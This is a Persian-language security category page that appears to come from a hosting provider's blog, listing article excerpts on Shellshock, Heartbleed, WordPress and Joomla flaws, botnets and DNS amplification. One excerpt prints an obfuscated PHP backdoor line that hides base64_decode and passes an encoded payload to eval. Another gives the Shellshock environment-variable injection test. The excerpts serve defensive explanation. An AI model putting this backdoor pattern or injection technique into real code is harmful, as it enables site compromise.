دسته: امنیت

کسب‌وکارتان را ایمن کنید! حقیقت این است که دنیای اینترنت خیلی خطرناک شده و از هر طرف هزاران خطر تهدیدتان می‌کنند. از حمله مستقیم هکرها گرفته تا نقص‌های فنی که منجر به نفوذ ویروس‌ها به کامپیوترتان می‌شوند. به همین خاطر امنیت اهمیت زیادی پیدا می‌کند و این دسته هم حاوی مقالاتی با این موضوع است.

برای اینکه یک دید کلی نسبت به میزان خطر موجود داشته باشید، مقاله هکرها چگونه اطلاعات شخص شما را می‌دزدند؟ را بخوانید. کلی مقاله دیگر در رابطه با انواع خطرها و مرتبط با امنیت در این بخش وجود دارند. هرکدام از این مقالات شامل اطلاعات بسیار ارزشمندی هستند.

برای مثال در مقاله حملات فروت فورس خیلی عمیق راجع به این نوع از هک توضیح داده شده است و اگر می‌خواهید امنیت بیشتری در دنیای اینترنت داشته باشید، خوب است که آن را بخوانید.

همچنین سعی می‌کنیم آسیب‌‌پذیری‌های مختلفی که در فضای اینترنت کشف می‌شوند را هم در قالب مقالات خبری برای شما منتشر کنیم تا بتوانید با رفع آن‌ها، امنیت خود و دستگاه‌تان را تضمین کنید.

آسیب پذیری امنیتی در bash

‫bash یک پوسته یونیکس و مفسر دستورات خط فرمان است که در اکثر لینوکس‌ها به عنوان پوسته پیش‌فرض نصب می‌شود. علاوه بر لینوکس در سیستم عامل MAC OSX نیز bash پوسته پیش فرض است. یک آسیب پذیری در bash اعلام شده‌‌است،‌ این حفره به کسانی که به متغییرهای محلی سیستم دسترسی دارند اجازه می‌دهد سیستم محدود کننده متغییرهای محلی bash را رد کند، با وارد کردن کدهای bash آسیب‌زا در متغییرهای محلی سیستم و اجرای این کدها به سیستم، دسترسی بگیرند. این آسیب‌پذیری همه محصولاتی که از bash استفاده می‌کنند (همه مخصولاتی که bash را اجرا می‌کنند) را تحت تاثیر قرار می‌دهد. آیا bash من آسیب‌پذیر است؟ برای بررسی آسیب‌پذیری bash دستور زیر را در bash وارد کنید. env x='() { :;}; echo vulnerable’ bash -c “echo this is a test” چنانچه خروجی دستور به شکل زیر باشد bash آسیب پذیر است و باید bash را به آخرین نسخه به‌روز رسانی کنید. vulnerable this is a test اگر با اجرای دستور خروجی زیر را مشاهده کردید BASH آسیب پذیر نیست. bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x’ this is a test چند نمونه از برنامه‌های آسیب‌پذیر: وب‌سرور httpd: اسکرپیت‌های CGI می‌توانند آسیب‌پذیر باشند، هنگامی که وب‌سرور اسکریپت […]

ویندوز Blue Screen‎

شرکت مایکروسافت روز جمعه مورخ ۲۰۱۴/۰۸/۱۶ به کاربران خود اعلام نمود، در صورتی که ویندوز خود را بروز رسانی کرده‌اند قبل از ریبوت کردن سیستم آخرین بسته‌های بروز رسانی شده بر روی ویندوز را uninstall کنند؛ چون بعد از انجام این بروز رسانی‌ها در صورت ریبوت سیستم ممکن است سرور شما با خطای Blue Screen (یا BSOD) مواجه شود. گفته می‌شود بروز رسانی‌های ارائه شده به‌دلیل مشکل امنیتی بوده که مایکروسافت سعی در برطرف نمودن أن داشته‌است. آسیب‌پذیری امنیتی مذکور از نوع ارتقا سطح دسترسی در سیستم‌های ویندوزی می‌باشد، به کمک این آسیب‌پدیری و با داشتن دسترسی محدود به سرور، در حد یک کاربر عادی، می‌توان به سطوح بالاتر دسترسی مانند Administrator دست پیدا کرد. مایکروسافت در بروز رسانی اخیر خود ۹ hotfix را ارائه کرده‌است که ۳ آسیب‌پذیری امنیتی را برطرف کند، اما متاسفانه بعد از بروز رسانی ویندوز مشکل جدی‌تری در سرور ایجاد می‌گردد. چه خطاهایی پس از بروز رسانی رخ می‌دهد؟ خطاهایی که بعد از بروز رسانی ممکن است رخ دهد به شرح ذیل می باشد: Stop 0x50 errors Xformer complaining of “Stop 0x50 errors همچنبن مشکل Blue Screen به خاطر اعمال نمودن یکی از ۴ آپدیت زیر گزارش شده است. ۲۹۸۲۷۹۱ MS14-045: Description of the security update for kernel-mode drivers: August […]

آسیب پذیری MailPoet در وردپرس

چند وقت پیش متوجه یک Malware (تروجان) تزریق شده در برخی وب‌سایت‌های WordPress (وردپرس) که خسارات زیادی به‌همراه داشت شدیم. این تروجان به‌کمک آسیب‌پذیری موجود در در پلاگین MailPoet به وردپرس تزریق و فعال می‌شود. منحصر به‌فرد بودن این تروجان به دلیل تزریق کورکورانه بارهای مخرب به وردپرس است، چیزی که باعث خرابی و از دسترس خارج شدن وب‌سایت می‌گردد. جستجوهای ما تا این لحظه در ارتباط با این تروجان نتایج زیر را در بر داشته‌است: هدف این حمله وب‌سایت‌های محبوب و پربازدید وردپرس می‌باشد. سایت‌هایی که تا کنون مورد حمله قرار گرفته‌اند از نسخه‌های قدیمی وردپرس یا پلاگین استفاده می‌کردند و یا رمز مدیر سایت ضعیف بوده‌است. سیستم کاری تروجان هنوز مبهم است اما یکی ار کارهای آن تزریق اسپم برای هک وب‌سایت است. تنها هسته وردپرس حمله نمی‌کند، بلکه قالب و پلاگین‌ها نیز در اهداف این تروجان قرار دارد. وب‌سایت‌هایی که به این تروجان آلوده شده‌اند پیغام‌های خطای متفاوتی به‌جای محتوای سایت نمایش داده‌اند، به‌صورت کلی اگر خطایی مشابه خطای زیر در وب‌سایت خود مشاهده کردید، به احتمال زیاد وب‌سایتتان آلوده شده‌است. Parse error: syntax error, unexpected ‘)’ in /home/user/public_html/site/wp-config.php on line 91 تنها راه شناخته شده پس از شناسایی و حذف تروجان برای ترمیم آسیب‌ها، بازگردانی آخرین نسخه سالم پشتیبان سایت است. […]

آسب‌پذیری امنیتی در vbulletin 5-x

تیم vBulletin یک patch امنیتی برای نسخه‌های ۵.۰.۴, ۵.۰.۵, ۵.۱.۰, ۵.۱.۱, و ۵.۱.۲ جهت رفع آسیب‌پذیری SQL Injection در صفحه لیست اعضا منتشر کرد. همه استفاده‌ کنندگان از این انجمن‌ساز باید در اولین فرصت به آخرین نسخه از این نرم‌افزار مهاجرت کنند. vBulletin (وی‌بولتن) یکی از محبوب‌ترین نرم‌افزارهای انجمن‌ساز است که تا کنون بیش از ۱۰۰ هزار نسخه از آن نصب شده و فعال است. وی‌بولتن در انجمن رسمی خود در باره این آسیب‌پذیری گفته‌است: این مشکل امنیتی در نسخه‌های ۵.۰.۴, ۵.۰.۵, ۵.۱.۰, ۵.۱.۱, و ۵.۱.۲ وجود دارد و ما یک بروزرسانی امنیتی برای آن منتشر کردیم. این مشکل به هکرها اجازه می‌دهد تا کدهای SQL خود را به دیتابیس تزریق و اجرا کنند. ما به کلیه وب‌مسترهایی که از وی‌بولتن استفاده می‌کنند توصیه می‌کنیم نرم‌افزار خود را در اولین زمان ممکن به آخرین نسخه بروز کنند. شما می‌توانید patch بروزرسانی را از آدرس http://members.vbulletin.com/patches.php دریافت نمایید. این آسیب‌پذیری به‌وسیله (Romanian Security Team (RST گزارش شده‌است و می‌تواند پیش از آن توسط گروه‌های دیگر کشف و مورد سوء استفاده قرار گرفته باشد. اگر درحال‌حاضر امکان بروزرسانی وی‌بولتن خود را ندارید، بهتر است دسترسی به صفحه memberlist را تا زمان بروزرسانی وی‌بولتن ببندید.

رفع خطای password protect

password protect به شما امکان رمزگذاری بر روی پوشه‌ای خاص از فضای وب‌سایت‌تان را می‌دهد، به‌عنوان مثال می‌توانید به کمک آن امنیت پوشه wp-admin وردپرس را افزایش دهید. چنانچه پس از فعال کردن این امکان، در زمان ورود به URL محافظت شده به وسیله‌ی password protect، با خطای «Error 404 – Not Found» مواجه شدید و یا Prompt (پنجره درخواست اطلاعات ورود) مرورگر نمایش داده نشد، برای رفع آن اقدامات زیر را انجام دهید: وارد پوشه مورد نظر (به‌عنوان مثال wp-admin) شوید. فایل .htaccess را باز کنید. عبارت ErrorDocument 401 default را جایگزین AuthGroupFile /dev/null کنید. در انتها تغییرات اعمال شده را ذخیره کنید.

معرفی CXS

اسکریپت ConfigServer eXploit Scanner (مخفف CXS) یک ابزار امنیتی و محصولی از شرکت ConfigServer است. به کمک این ابزار میتوان تا حدودی از اسکریپت‌های مخرب نظیر وب‌شل و ابزارهای هک در امان ماند. می‌توان CXS را یک Exploit (پویشگر ابزارهای مخرب) دانست. CXS مخصوص سرورهایی با سیستم‌عامل CentOS به‌همراه کنترل‌پنل DirectAdmin یا cPanel می‌باشد. اگر به امنیت بیشتر سرورها می‌اندیشید و یا به دنبال یک اسکریپت امنیتی خوب می‌گردید، پیشنهاد ما CXS است. جهت تهیه لایسنس CXS به لینک مراجعه نمایید. مهم ترین قابلیت‌های CXS: ۱- Realtime Monitoring: بررسی و مانیتور لحظه به لحظه سرور. با فعال نمودن و پیکر بندی مناسب امکان CXS Watch Daemon، در صورت آپلود فایل مخرب، فایل به سرعت حذف یا قرنطینه و گزارش آن برای مدیر سرور ارسال خواهد شد. ۲- integrated with ClamAv: هماهنگی با آنتی ویروس قدرتمند ClamAv. این هماهنگی با آنتی ویروس قدرتمند ClamAv از آپلود ویروس‌ها جلوگیری می‌کند. ۳- integrated with CSF: هماهنگی با فایروال CSF. با پیکر بندی مناسب می‌توان تنظیم کرد که وقتی فایل مخربی بر روی سرور آپلود شد، IP شخص خاطی توسط CSF بلوکه گردد. ۴- integrated with ModSecurity: هماهنگی با ModSecurity. با پیکر بندی مناسب می‌توان تنظیم کرد که وقتی فایل مخربی بر روی سرور آپلود شد، IP شخص خاطی توسط ModSecurity بلوکه گردد. سایر […]

عمر مفید یک Hard disk. یک هارد چقدر عمر می کند؟

عمر مفید یک Hard disk (هارد دیسک) چقدر است؟ کوتاه‌ترین و صادقانه‌ترین جوابی که می‌توان به این سوال داد «نمی‌دانیم» است. خوشبختانه به لطف تحقیقات انجام شده در شرکت Backblaze امروزه حدس‌هایی در این زمینه زده می‌شود. هارد دیسک یا دیسک سخت، یکی از مهمترین بخش‌های یک سیستم‌کامپیوتری می‌باشد، چون یکی از حافظه‌های غیر فرار سیستم‌های کامپیوتری جهت ذخیره‌ی دائم اطلاعات می‌باشد و در دسته حافظه‌های غیرفرار سریع‌ترین نیز محسوب می‌گردد. Backblaze یکی از شرکت‌های معتبر پشتیبان‌گیری آنلاین از اطلاعات، پس از تحقیق ۴ ساله خود بر روی ۲۵۰۰۰ هارد که شبانه روز و بی‌وقفه در این موسسه مشغول به کار بوده‌اند، اعلام کرد: «تنها ۷۸٪ از هارد دیسک‌ها بیش از چهارسال عمر کرده‌اند و هنوز در حال فعالیت می‌باشند، ۲۲٪ دیگر قبل از ۴ سال خراب شدند!» چگونه از هارد دیسک‌ها در Backblaze استفاده می‌شود: Backblaze تعداد بسیار زیادی هارد دیسک با حجم قابل توجه جهت ذخیره سازی اطلاعات استفاده می‌کند. هر ۴۵ هارد در یک Pod ذخیره سازی و مجموعه‌ای از Podها در یک Rack (رکِ)‌ دیتاسنتر Backblaze قرار دارد. با توجه به کاربران جدیدی که به مجموعه اضافه می‌شوند، Backblaze همیشه در حال تهیه هارد دیسک‌های جدید، بررسی و تست آن‌ها و اضافه کردن هاردها به Pod است. در حال حاضر 75PB تجهیزات ذخیره […]

حفره‌ی امنیتی مهم OAuth2 و ماژول OpenID مشابه با heartbleed

هنوز زمان زیادی از مشکل امنیتی موجود در openssl –خونریزی قلبی– نمی‌گذرد و همچنان کاربران در حال بروز رسانی و رفع مشکلات ایجاد شده توسط این حفره هستند که شاهد بروز مشکل امنیتی دیگری بر روی پروتکل OAuth2 و ماژول OpenID هستیم. پروتکل OAuth در سایت‌هایی نظیر گوگل، فیس‌بوک، لینکداین، یاهو، و بسیاری از سایت‌های بزرگ دیگر استفاده شده‌است. لیست سایت‌هایی که از پروتکل OAuth استفاده می‌کنند را می‌توانید از لینک http://en.wikipedia.org/wiki/OAuth مشاهده نمایید. پروتکل OAuth: پروتکلی است که برای متصل کردن ۲ یا جند حساب کاربری در سایت‌های مختلف استفاده می‌شود. به‌عنوان مثال می‌توانید از سایتی مانند Linkedin.com بدون ساخت حساب کاربری، به‌وسیله‌ی حساب‌ کاربری سایر سایت‌ها مانند فیس‌بوک، گوگل و توئیتر که از OAuth2 و ماژول OpenID استفاده می‌کنند، استفاده نمایید. در این حالت ابتدا شما به سایتی که در آن حساب کاربری دارید Log in و پس از تعیین اعتبار به سایت لینکداین متصل خواهید شد. حفره‌ی امنیتی جدیدی به نفوذگران امکان می‌دهد که با استفاده از تکنیک‌های phishing در زمان درخواست نام کاربری و رمز عبور، اطلاعات کاربری شما را سرقت و از آن سوء استفاده نمایند. برای جلوگیری از سرقت اطلاعات و با توجه به عدم ارائه راه‌حل معتبر تا کنون، توصیه ما به شما این است که تا اطلاع ثانوی و رفع مشکل امنیتی از OpenID جهت […]

توابع PHP Callback راه جدید مخفی کردن Backdoorها

امروزه هکرها و نویسندگان بدافزارها به‌دنبال روش‌های نوین و پیچیده‌ای برای مخفی کردن کدهای مخرب خود هستند. یکی از روش‌هایی که در سال‌های اخیر محبوبیت زیادی پیدا کرده، استفاده از توابع callback در زبان‌هایی مانند PHP است. توابع callback به‌طور معمول به‌عنوان ابزاری برای مدیریت رویدادها و کاهش پیچیدگی برنامه‌نویسی استفاده می‌شوند، اما هنگامی که در دستان نادرستی قرار گیرند، می‌توانند به ابزار مناسبی برای پنهان کردن backdoorها تبدیل شوند. در زمینه‌ی امنیت سایبری، Backdoor یا درب پشتی به کدی گفته می‌شود که به‌طور مخفیانه در سیستم یا نرم‌افزاری قرار می‌گیرد تا به فرد مهاجم دسترسی غیرمجاز به سیستم بدهد. این دسترسی معمولاً بدون اطلاع یا رضایت کاربر اصلی است و هکر را قادر می‌سازد تا به داده‌ها یا منابع سیستم دسترسی پیدا کند، کدهای دیگری اجرا کند یا حتی کنترل کامل سیستم را در دست بگیرد. در این مقاله قصد داریم به بررسی مفهوم callback و چگونگی استفاده از آن در پنهان کردن بدافزارها بپردازیم. Callback چیست؟ به طور کلی، Callback به معنای فراخوانی به عقب است. در برنامه‌نویسی، توابع callback توابعی هستند که به‌عنوان آرگومان به توابع دیگر پاس داده می‌شوند و سپس در زمان مشخصی توسط تابع دریافت‌کننده اجرا می‌گردند. این تکنیک به برنامه‌نویسان اجازه می‌دهد تا […]

آیا با وجود حل مشکل Heartbleed باید رمزها را تغییر داد؟

با توجه به حفره امنیتی SSL به نام Heartbleed که این روزهای جنجال‌های بسیار زیاد و نگرانی‌های قابل درک کاربران را به همراه داشته‌است، توصیه ما به شما تغییر رمزهای عبور خود در اولین فرصت ممکن می‌باشد. گوگل اعلام کرده است که کاربران نیازی به تغییر پسورد خود ندارند، اما برای امنیت بیشتر بهتر است این کار را انجام دهید. خصوصا با توجه به بررسی وب‌سایت Mashable مبنی بر وضعیت امنیتی برخی سایت‌های معروف و وضعیت آن‌ها در مورد این حفره، بهتر است رمزعبور سایت‌هایی را در لیست زیر ذکر شده است تغییر دهید. برای مشاهده لیست کامل می‌توانید به وب‌سایت Mashable مراجعه نمایید. شبکه‌های اجتماعی: نام تحت تاثیر Heartbleed قرار گرفته‌است؟ مشکل امنیتی برطرف شده‌است؟ پسورد را تغییر دهیم؟ فیس‌بوک – Facebook بلی بلی بلی تویتر – Twitter بلی بلی نامشخص اینستاگرام – Instagram بلی بلی بلی لینکداین – LinkedIn خیر خیر خیر پینترست – Pinterest بلی بلی بلی تامبلر – Tumbler بلی بلی بلی شرکت‌های بزرگ: نام تحت تاثیر Heartbleed قرار گرفته‌است؟ مشکل امنیتی برطرف شده‌است؟ پسورد را تغییر دهیم؟ گوگل – Google بلی بلی بلی مایکروسافت – Microsoft خیر خیر خیر یاهو – Yahoo بلی بلی بلی اپل – Apple خیر خیر خیر آمازون – Amazon خیر خیر خیر ایمیل: نام تحت تاثیر Heartbleed قرار گرفته‌است؟ […]

حفره امنیتی SSL Heartbleed و راه مقابله با آن

دیروز Bug (حفره) امنیتی جدیدی در هسته کتابخانه‌های مورد نیاز SSL منتشر شده‌است که باعث می‌شود تا اطلاعات ذخیره شده در Memory سرویس دهنده و سرویس گیرنده با حجم۶۴ کیلوبایت و یا بیشتر فاش شود. اطلاعاتی که در Memory سرویس دهنده و گیرنده ذخیره می‌شوند عبارتند از: ۱- Primary key ۲- Secondary key ۳- Protected content ۴- Collateral ۱- primary key: اطلاعات موجود در Primary key عبارتند از: «کلید محرمانه SSL» که دسترسی به این کلید به نفوذگر امکان رمز گشایی ترافیک‌های گذشته و آینده ارسالی به سمت سرویس گیرنده را میدهد. ۲- secondary key: اطلاعات ذخیره شده در Secondary key عبارتند از: «اطلاعات مربوطه به اعتبارسنجی‌ها»، می‌توان نام‌های کاربری و رمزهای عبور را در این دست اطلاعات قرار داد. ۳- Protected content‌: اطلاعات موجود در Protected content عبارتند از: «محتوای ایمیل‌ها، عکس‌ها و مطالب تبادل شده بین سرویس گیرنده و سرویس دهنده»، در حالت عادی فقط مالک ایمیل می‌تواند به این اطلاعات دسترسی داشته باشد. ۴- Collateral: اطلاعات ذخیره شده در Collateral عبارتند از: «اطلاعات مربوط به Memory» که می‌توان جزییات فنی نظیر آدرس حافظه، مکانیزم‌های امنیتی جهت جلوگیری از حملات buffer overflow (حملات سریز حافظه) و غیره […]

حملات DDoS از طریق سایت‌های WordPress

حملات DDoS امروزه به‌دلیل اهمیت موضوع، بسیار مورد مطالعه و بررسی قرار می‌گیرد. در این مقاله قصد داریم تا درباره حمله‌ای گسترده که توانسته از هزاران سایت WordPress از همه جا بی‌خبر به‌عنوان منبع تکثیر استفاده کند، صحبت کنیم. بیش از ۱۶۲۰۰۰ سایت WordPress برای حملات توزیع شده اختلال در سرویس (DDoS) استفاده می‌شوند. چنانچه قابلیت pingback در سایت WordPress فعال باشد (به‌صورت پیش فرض غیرفعال است) می‌تواند برای حملات DDoS علیه سایت دیگر استفاده شود. توجه داشته باشید که XMLRP در pingback، Trackbacks، remote access از طریق موبایل و تعدادی ویژگی دیگر که شما احتمالا خیلی به آن‌ها علاقمندید، استفاده شده‌است بنابراین آن‌ها نیز می‌توانند مورد سوء استفاده قرار گیرند. بررسی روال انجام حملات DDoS به کمک سایت WordPress: حمله DDOS علیه یک سایت WordPress پربازدید توانست آن را برای ساعت‌های طولانی با کندی زیادی مواجه کند، زمانی که این حملات زیاد شد هاست سایت به کلی از سرویس دهی ناتوان و سایت از دسترس خارج شد. برای رفع مشکل صاحبان سایت مجبور شدند که سرور خود را در zone یک فایروال قرار دهند تا بتوانند حملات را مانیتور نمایند. پس از انتقال متوجه یک حمله سیل آسای توزیع شده مبتنی بر HTTP شدند. هزاران request (درخواست) در هر ثانیه به […]

بروزرسانی‌های امنیتی Joomla

تیم امنیتی جوملا به تازگی ۲ نسخه بروز رسانی امنیتی برای نسخه‌های ۲.۵.۱۹ و ۳.۲.۳ ارائه کرده‌است. چنانچه برای پیاده‌سازی وب‌سایت خود از هسته جوملا استفاده کرده‌اید، برای اطمینان داشتن از امنیت سایت خود، حتما در اسرع وقت نسبت به روزرسانی و اعمال این patchها اقدام نمایید. یک تیم ۳۰ نفره متشکل از داوطلبان متخصص جوملا توانسته‌اند ۴۰ bug (رخنه) را در مدیریت محتوای جوملا ۳.۲.۳ رفع کنند که شامل ۴ رخنه امنیتی نیز بوده‌است. ۱. با اولویت بالا: آسیب SQL Injection در هسته اصلی جوملای نسخه ۳.۱.۰ تا ۳.۲.۲. ۲. با اولویت متوسط: آسیب پذیری XSS در هسته جوملای نسخه ۳.۱.۲ تا ۳.۲.۲. ۳. با اولویت متوسط: آسیب پذیری XSS در هسته جوملای نسخه ۲.۵.۱۸ به قبل و نسخه ۳.۲.۲ به قبل. ۴. با اولویت متوسط: آسیب پذیری دسترسی غیرمجاز از طریق احراز هویت Gmail در هسته جوملای نسخه ۲.۵.۱۸ به قبل و نسخه های ۳.۲.۲ به قبل. همانطور که مشاهده میکنید، آسیب‌های SQL Injection و دسترسی غیرمجاز از طریق احراز هویت Gmail (که به صورت پیش فرض غیر فعال می‌باشند) از اولویت بالایی برخوردار هستند. به‌نظر می‌رسد آسیب SQL injection به دلیل عدم محافظت درست از id مجموعه وب لینک‌ها و سوء استفاده […]

Backdoorهای پنهان

امروزه دیگر کدهای مخرب پاسخگوی اهداف تولید کننده‌گانشان نیستند، چون به سادگی شناسایی و حذف می‌گردند. کلید موفقیت مهاجمان برای ایجاد بدافزار سودآور؛ در پشتکار و تکرار عملیات تا زمان موفقیت نهفته است. به همین دلیل ما شاهد افزایش نرم‌افزارهای خلاقانه بر مبنای تکنیک‌های Backdoor هستیم. بدافزارهایی که در آن‌ها از روش‌های منحصر به فرد و متدهای مبهم برای افزایش طول عمر حملات استفاده می‌گردد. در ادامه برای معرفی بهتر Backdoor سناریویی که امروز با آن مواجه شدم را شرح خواهم داد: یک نمونه ربات تزریق SPAM می‌تواند تکه کد ساده ولی حرفه‌ای زیر را به یکی از فایل‌های معتبر جوملا اضافه نماید. $stg=”ba”.”se”.”64_d”.”ecode”;eval ($stg(“JHNlcnZlcl91c2VyX2FnZW50ICAgID0gJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KJHNlcnZlcl9yZWZlcmVyICAgICAgID0gQCRfU0VSVkVSWydIVFRQXJFRkVSRVInXTsNCiRzZXJ2ZXJfZm9yd2FyZGVkX2ZvciA9IEAkX1N…. قطعه کد بالا ترفند جدیدی نیست، از این دسته حملات در نسخه‌های قدیمی سایت‌ساز جوملا بسیار دیده شده‌است‌ و هزاران مطلب در رابطه با آن بر بستر اینترنت وجود دارد. اما این ربات‌ها در اکثر مواقع تنها نیستند و یک همدست برای رسیدن به قصد نهایی خود دارند؛ همدستی مانند یک پوسته‌ی قدیمی PHP که دسترسی دائمی سرور را به مهاجم خواهد داد. این مطلب نیز جدید نیست. Crontab Backdoor: پیدا کردن و حذف قطعه کد مخرب فوق بسیار آسان بود، اما سایت در کمتر از ۱۰ دقیقه مجددا آلوده شد!!! با توجه به اینکه، سایت مثال ما از نسخه‌ی قدیمی جوملا استفاده می‌کند، […]

موارد امنیتی که در زمان استفاده از SQL Server Managment می‌توان به‌کار برد.

امنیت در زمان استفاده از بانک‌های اطلاعاتی، خصوصا بر بستر اینترنت یکی از موارد مهم این‌روزها است. در این مقاله قصد داریم خلاصه‌ای از بهترین موارد امنیتی که در هنگام استفاده از SQL Server Management می‌توان درنظر گرفت را بیان کنیم: تنهاComponent (کامپوننت‌)ها و Network Libraryهایی که نیاز دارید را نصب کنید. بعد از نصب با استفاده از ابزار SQL Server Configuration Manager، ویژگی‌ها و سرویس‌های غیر ضروری را غیر فعال کنید. حالت Windows Authentication امن‌تر از حالت SQL Authentication و توصیه شده‌است تا حد امکان از حالت Windows Authentication mode استفاده کنید؛ اگر احتیاج به استفاده از حالت SQL Authentication دارید حتما از رمز عبورهای پیچیده‌ استفاده کنید. موارد زیر را در انتخاب رمز عبور و نام‌کاربری در نظر بگیرید: بهتر است رمز انتخابی ترکیبی از حروف کوچک، بزرگ، سمبل‌ها -کارکترهای غیر الفبایی مانند &, ^,%,*,$- و اعداد باشد. از نام‌های کاربری شناخته شده، رایج و آسان مانند admin ،password ،sa ،administrator ،sysadmin و امثال آن استفاده نکنید. از رمز عبورهای طولانی استفاده کنید (حداقل ۸ کاراکتر). چنانچه نیاز به استفاده از حالت SQL Authentication دارید، حتما از گواهینامه SSL معتبر استفاده کنید. SQL Server 2005 اجازه نمی‌دهد که اکانت sa بدون پسورد باشد، بنابراین رمز عبور اکانت sa […]

Microsoft Network Monitor Tool 3.4

Microsoft Network Monitor Tool 3.4 ابزاری ارائه شده توسط Microsoft، جهت دریافت، نمایش، و تحلیل داده‌های شبکه و بازگشایی پروتکل‌های شبکه می‌باشد. این ابزار دارای Filtering کامل و هوشمند بوده، و می‌تواند ابزار مفیدی برای مدیر و مدیریت شبکه باشد. توانایی نمایش Frame به Frame کلیه Packetها را درلابه ۲ شبکه دارد . بسته نصاب این ابزار با نام NMSetup.exe در وب سایت رسمی Microsoft به صورت رایگان، جهت استفاده عموم قرار دارد. روش استفاده از برنامه Microsoft Network Monitor پس از باز نمودن برنامه صفحه ای مانند صفحه زیر نمایش داده میشود، که درکادر سمت چپ پایین آن می‌توانید لیست شبکه‌های که در آن وجود دارید را مشاهده نمایید. از لیست حاضر ترافیک شبکه‌هایی که نیاز به بررسی آن را دارید انتخاب، سپس از کادر بالا (سمت چپ) بر روی گزینه New capture Tab کلیک نمایید، صفحه‌ای مانند صفحه زیر به تب‌های شما اضافه می‌گردد. با انتخاب گزینه start (و یا فشردن دکمه f5) ‌کلیه ترافیک مبادله شده بر روی کارت های شبکه انتخاب شده در مرحله قبل به نمایش در می‌آید. در کادر Network Conversation لیست سرویس‌های فعال که از ترافیک شبکه استفاده میکنند را مشاهده میکنید. با انتخاب هر یک از سرویس های موجود در کادر Frame Summary […]

تحلیل Botnet نظیر به نظیر waledac

Botnets (بات‌نت‌ها) شبکه‌هایی از کامپیوترهای آلوده به بدافزار هستند که قادر به دریافت و اجرای فرامین صادر شده توسط Botmasters (مهاجمین راه‌دور) می‌باشند. بات‌نت، نه تنها حمله را از دید کاربران مخفی نگه می‌دارند، بلکه به عنوان یک زیربنا برای بسیاری از انواع جرایم اینترنتی محسوب می‌شوند. از این نوع جرایم می‌توان به ارسال انبوه هرزنامه، حمله‌های DDoS (جلوگیری از سرویس توزیعی)، سرقت هویت و غیره اشاره کرد. در سال‌های اخیر بر روی روش‌های تشخیص و جلوگیری از بات‌نت‌ها تحقیقات زیادی انجام شده است، اما بات‌نت‌ها نیز به همان اندازه در حال رشد و گسترش هستند. مهاجمین برای محکم سازی زیربنای ارسال فرامین خود از انواع روش‌های مختلف از قبیلِ رمزنگاری، پروتکل‌های ارتباطی جدید و … استفاده می‌کنند. معماری اولیه‌ی Command and Control (کانال‌های فرمان و کنترل) بات‌نت‌ها به صورت متمرکز بود، ولی به دلیل وجود Single point of failure (در این حالت کل بات‌نت از بین می‌رود)، امروزه از پروتکل ارتباطی نظیر به نظیر غیر متمرکز استفاده می‌کنند. در بات‌نت‌های غیرمتمرکز با شناسایی تعدادی از میزبان‌های آلوده به بات نمی‌توان کل شبکه بات‌نت را از کار انداخت. بات‌نت‌های غیر متمرکز به دو دسته ی نظیر به نظیر و Hybrid (ترکیبی) تقسیم می‌شوند. در یک بات‌نت نظیر به نظیر، بات‌ها […]

شانزدهمین کنفرانس Black Hat

هرساله در همین ایام، تمام نگاه‌ها در صنعت امنیت اطلاعات دنیا معطوف به کنفرانس BlackHat در ایالات متحده میباشد، کنفرانسی که در آن تمام بزرگان امنیت و هک دور هم جمع می‌شوند تا در کنار قدرت نمایی، جدیدترین دست آوردهای امنیتی را به نمایش گذارند. می‌توان گفت مدیران ارشد صنعت امنیت، بزرگان دنیای هک، پژوهشگرها و شرکت‌های تجاری ارایه دهنده‌ی محصولات مقابله با تهدیدات امنیتی، این کنفرانس را یکی از مهمترین رویدادهای امنیتی بحساب می‌آورند. این کنفرانس نخستین بار در سال ۱۹۹۷ توسط جف ماس (Jeff Moss) که اکنون مدیر شرکت ICANN است، پایه گذاری شد. شانزدهمین کنفرانس Black Hat امسال در لاس وگاس آمریکا طی شش روز (۲۷ July- 1 August) که ۴ روز آن کارگاه‌های هک و امنیت و دو روز پایانی معرفی و ارایه جدیدترین دستاوردها است، برگزار خواهد شد. پیش بینی شده است که ۴۰۰۰ نفر امسال در این کنفرانس شرکت خواهند کرد. تصمیم کمیته‌ی برگزاری برای اهدای جوایز به برترین‌های امنیت جهان، آخرین روز ماه جولای را تبدیل به پرهیجان‌ترین روز کرده است، جایزه‌ی معروف به Pwnie Award در گروه‌های زیر اهدا خواهد شد: Pwnie for Best Server-Side Bug Pwnie for Best Client-Side Bug Pwnie for Best Privilege Escalation Bug Pwnie for Most Innovative Research […]

حمله DNS Amplification چیست؟ چطور با آن مقابله کنیم؟

یکی از مشکلات مشهور، که گریبان‌گیر مدیران سروراختصاصی و مجازی شده، مصرف نامتعارف و بیش از حد ترافیک ماهیانه‌ سرویس است. اغلب کاربران جهت بررسی و رفع آن به‌دنبال منشاء مصرف در کنترل‌پنل هاستینگ خود هستند، اما هیچ کاربری با این میزان مصرف ترافیک وجود نداشته و درنتیجه جستجوی آن‌ها نتیجه‌ای در بر نخواهد داشت. بررسی‌های اخیر تیم فنی ایران‌سرور نشان می‌دهد سرچشمه و دلیل اصلی مصرف بیش از اندازه‌ی ترافیک، یک حفره امنیتی در سرویس DNS مشهور به DNS Amplification است. 👈 اگر دربارۀ DNS اطلاعات ندارید، مقالۀ دی ان اس چیست را مرور کنید. DNS Amplification چیست؟ DNS Amplification را می‌توان در دسته‌ی حملات اختلال در سرویس DOS قرار داد، و یکی از معروفترین حملات DDOS، که هدف آن افزایش ترافیک DNS برروی سیستم قربانی می‌باشد نامید. 💡 در مقاله حمله DDoS چیست، به زبان ساده با این نوع از حملات که تعدادشان هم کم نیست، آشنا شوید. شاید بتوان ساده‌ترین تعریف از این نوع حمله را به این شکل بیان نمود که نفوذگر تعداد زیادی درخواست DNS را به Open DNS Resolverها مانند ۸.۸.۸.۸ یا ۴.۲.۲.۴ ارسال میکند، این درخواست بصورتی ایجاد شده است که پاسخ آن به IP قربانی ارسال میشود، بدین صورت تعداد زیادی درخواست […]

حمله گسترده به وب‌سایت‌های وردپرس

